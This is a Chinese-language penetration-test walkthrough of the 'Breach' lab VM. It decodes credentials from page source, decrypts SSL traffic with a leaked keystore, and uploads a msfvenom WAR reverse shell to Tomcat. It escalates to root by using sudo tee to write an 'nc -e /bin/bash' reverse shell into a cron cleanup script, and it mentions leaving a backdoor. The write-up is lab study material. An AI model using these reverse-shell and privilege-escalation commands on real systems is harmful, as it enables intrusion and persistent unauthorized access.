Breach 渗透测试
0x00实验环境
靶机:breach,IP地址:192.168.110.140
测试机:Kali,IP地址:192.168.110.6;
0x01实验流程
信息收集——主机发现、端口扫描
渗透测试
0x02实验步骤
- 主机发现
- masscan --rate=100000 -p 0-65535 192.168.110.140 发现未扫描出有效信息
- 访问web端
查看主页源码发现一串加密字符
Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
解密得:
cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
再次解密:
pgibbons:damnitfeel$goodtobeagang$ta
这应当是登录用户名密码
尝试登录
成功登录后台
- 发现有三封邮件并逐个查看
发现
发现192.168.110.140/.keystore
keystore是存储公私密钥的一种文件格式
下载该密钥文件
然后浏览账户
点击content
发现一个流量包并下载
- 使用wireshark打开该流量包
无法直接打开,应该是被加密
查看keystore中的密钥
查看密钥库文件信息:
指令:keytool -list -v -keystore 密钥库文件名 -storepass 密钥库密码
安装jdk1.8并执行keytool
导出密钥
keytool -importkeystore -srckeystore /root/Downloads/keystore -destkeystore /root/Downloads/tomcat.p12 -deststoretype PKCS12 -srcalias tomcat
将.p12证书导入Wireshark
打开数据包
查看数据包
解密该字段
又一个登录用户名密码
tomcat:Tt\5D8F(#!*u=G)4m7zB
注意,较新版本的浏览器会显示不安全连接
需要旧版本的才可以访问该url
- 上传jsp一句话木马,打包压缩并更改压缩包后缀为war
但是一会儿木马就被删除了,可能是由杀软,重新生成并上传木马
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.6 lport=4444 -f war -o ba.war
生成war格式的反弹shell
Msf开启监听
Tomcat后台上传ba.war
访问ba,获得反弹shell
- 接下来,提权
在/var/www/5446目录下发现可疑文件
查看文件
这是mysql的连接数据,密码为空
连接mysql
得到用户名密码
milton | 6450d89bd3aff1d893b85d3ad65d2ec2
debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878
解密得到
Milton : thelaststraw
切换用户milton
发现一个blumbergh用户
- 查看网站图片
下载至kali
使用strings打印各图片其中的可打印字符
strings my_badge.jpg >> image.txt未有有价值信息
同样操作其他图片
得到
coffeestains
- 尝试登录blumbergh
登录成功
查看该用户下root权限命令
tee - 重定向输出到多个文件
tee [-ai][–help][–version][文件…]
参数:
-a或–append 附加到既有文件的后面,而非覆盖它.
-i或–ignore-interrupts 忽略中断信号。
–help 在线帮助。
–version 显示版本信息。
无法使用tee向/etc/passwd中写入信息
尝试tidyup.sh
这个脚本是定时清理脚本
而且只有root有写的权限
先写一个nc反弹脚本
echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt
再将该脚本用tee写入tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
Kali监听等待得到root权限的shell
- 清理痕迹,留后门
总结:
- 从网页源码中解密出CMS账号密码
- 导入ssl证书到Wireshark中解密经过SSL加密的http流量,获得Tomcat后台登录URL和账号密码
- Tomcat后台get shell
- 提权时套注意当前用户目录下的文件以及其可以执行的root权限命令
